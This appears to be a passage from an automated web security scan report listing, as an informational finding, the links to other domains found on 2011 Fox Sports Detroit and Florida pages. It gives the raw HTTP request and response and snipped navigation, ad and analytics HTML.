<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Detroit</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/7538.jpg border=0></a>
<div>
<a href='http://www.foxsportsarizona.com' target = '_blank' >FS Arizona</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
...[SNIP]...
</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FS Florida</a>
<a href='http://www.foxsportshouston.com' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/redwings' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/7697.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/nhl/teamstats.asp?teamno=05&btnGo=Go&type=teamhome' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/nhl/teamstats.asp?teamno=05&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/nhl/standings_conference.asp' target = '_blank' >Standings</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/nhl/scoreboard.asp' target = '_blank' >Scores</a>
...[SNIP]...
<a href='/pages/pistons' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/7698.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/nba/teamstats.asp?teamno=08&btnGo=Go&type=teamhome' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/nba/teamstats.asp?teamno=08&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/nba/standings_conference.asp' target = '_blank' >Standings</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/nba/scoreboard.asp' target = '_blank' >Scores</a>
...[SNIP]...
<a href='/pages/tigers' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/7700.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/mlb/teamreports.asp?tm=06&report=teamhome' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/mlb/teamreports.asp?tm=06&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/mlb/standings.asp' target = '_blank' >Standings</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/mlb/scoreboard.asp' target = '_blank' >Scores</a>
...[SNIP]...
<a href='/pages/lions' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/8162.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/fb/teamstats.asp?tm=08' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/fb/teamstats.asp?yr=2010&tm=8&btnGo=Go&type=schedules' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/fb/totalstandings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsdetroit.stats.com/fb/scoreboard.asp' target = '_blank' >Scores</a>
...[SNIP]...
<a href='/pages/um' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/8166.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=357&report=teamhome' target = '_blank' >Team Page </a>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=357&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=357&report=stats' target = '_blank' >Stats</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/cbk/polls.asp' target = '_blank' >Polls</a>
</div><a href='/pages/msu' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/8165.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=0358&report=teamhome' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=358&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=358&report=stats' target = '_blank' >Stats</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/cbk/polls.asp' target = '_blank' >Polls</a>
</div><a href='/pages/aprilinthed' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/16510.jpg border=0></a>
<a href='http://foxsportsdetroit.com/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/9571.jpg border=0></a>
...[SNIP]...
<a href="/pages/main"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/navtrans1.gif" alt="" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849808?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849808?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849808?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_389326">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/Open-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326^feedID=3701^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=389326&feedID=3701&" target=_blank rel="nofollow">
...[SNIP]...
/sharer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('Open Mike: Brady Bunch? Michigan hopes so') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsdetroit.com/common/dynrss/dynrss_3701_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
<p style='width:665px;text-align:center'><img src='http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/311304.jpg'></p>
...[SNIP]...
<br>-- <a href="http://www.fsdetroit.com/01/11/11/Michigan-names-Brady-Hoke-as-its-new-foo/landing.html?blockID=389248&amp;feedID=3701">Michigan names Brady Hoke as its new football coach</a>
...[SNIP]...
<div class='sidebar_230'>
<a href="http://msn.foxsports.com/collegefootball" target="new"><center><img src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/334026.jpg" alignment="non" border="0"></center></a>Get all your national college football news and features at FOXSports.com's <a href="http://msn.foxsports.com/collegefootball" target="new"><b>
...[SNIP]...
<a href="http://www.foxsportsdetroit.com/pages/streaming"><img src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/361273.jpg" alt="stream_story.jpg" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<a href="http://www.foxsportsdetroit.com/pages/pistonsschedule"><img src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/359523.jpg" alt="0112memphis_pistonsnite.jpg" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<a href="/pages/mcdonalds_pog"><img src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/356654.jpg" alt="mcdonaldPOGside.jpg" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849809?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849809?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849809?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<a href='/common/ad_count.php?segmentID=8658' target='_blank'><IMG SRC='http://wac.2532.edgecastcdn.net/802532/foxdetro/common/ad_media/274/adserver_4735.gif' width='88' height='31' border=0></a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(15)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(5)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.nhl.com/ice/page.htm?id=66980">Detroit's Lidstrom makes All-Star roster</a>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/miami-heat-cleveland-cavaliers-lebron-james-tweets-insult-to-former-team-011111
" target='_blank'>
LeBron rips Cavs via Twitter
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat
" target='_blank'>
Heat or 3Peat
</a>
...[SNIP]...
<li><a href="http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709
" target='_blank'>
Lakers crush Cavs in historic fashion
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Los-Angeles-Lakers-Kobe-Bryant-blast-Cleveland-Cavaliers-by-55-for-fifth-straight-win-011111
" target='_blank'>
Lakers hand Cavs 11th straight loss
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Michigan-names-Brady-Hoke-next-head-football-coach-011111
" target='_blank'>
Michigan hires Hoke as football coach
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/page/nfl-weekly-review-2010
" target='_blank'>
Redirect NFL Weekly Preview
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/NFL-playoff-picture-scenarios-2010
" target='_blank'>
NFL playoff schedule
</a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(5)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(12)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(15)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<td align="left" valign="top"><a

href="http://www.foxsportsarizona.com"

target="_blank">
FOX Sports Arizona</a><br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a>
...[SNIP]...
<br>

<a href="http://www.foxsportsflorida.com"

target="_blank">
FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<a href="javascript:void(window.open('http://www.platformic.com'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/266/191108.jpg" alt="" alignment="texttop" border="0" hspace="" vspace=""></a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

5.4. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962&feedID=7926 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:26:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=e13925e027f6802b91cb1759a97c21c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 69118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<link rel="image_src" href="http://www.foxsportsflorida.com/common/medialib/264/296250_thumb.jpg" />
<link href="http://wac.2532.edgecastcdn.net/802532/foxsport/common/appcss/~1294841769/l=default_heat_background~landing_reiter~menz1213~menz1194~menz1617~horizontal_tabs_1027~custom_classes~component_masthead_test2~component_right_heat_fullblog~component_footer/g=style/ucdn=1" rel="stylesheet" type="text/css" />

<!--<script language="javascript">
...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/appjs/~1294841769/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~comment_box~flashobject/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.msn.com"><img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.msn.com/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.msn.com/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Florida</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/7578.jpg border=0></a>
<div>
<a href='http://www.foxsportsarizona.com' target = '_blank' >FS Arizona</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FS Detroit</a>
...[SNIP]...
</a>
<a href='http://www.foxsportshouston.com/' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/rays' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14473.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?tm=30&report=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=30&btnGo=Go&report=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=30&btnGo=Go&report=roster' target = '_self' >Roster</a>
...[SNIP]...
<a href='/pages/marlins' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14474.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?tm=28&report=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=28&btnGo=Go&report=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=28&btnGo=Go&report=roster' target = '_self' >Roster</a>
...[SNIP]...
<a href='/pages/magic' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14475.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&btnGo=Go&type=pgstats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&btnGo=Go&type=roster' target = '_self' >Roster</a>
...[SNIP]...
<a href='/pages/heat' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14484.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&type=pgstats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&btnGo=Go&type=roster' target = '_self' >Roster</a>
...[SNIP]...
<a href='/pages/lightning' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14485.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=20&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=20&type=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=roster&teamno=20' target = '_self' >Roster</a>
</div><a href='/pages/flapanthers' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14486.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=schedule&teamno=26' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=stats&teamno=26' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=26&type=roster' target = '_self' >Roster</a>
...[SNIP]...
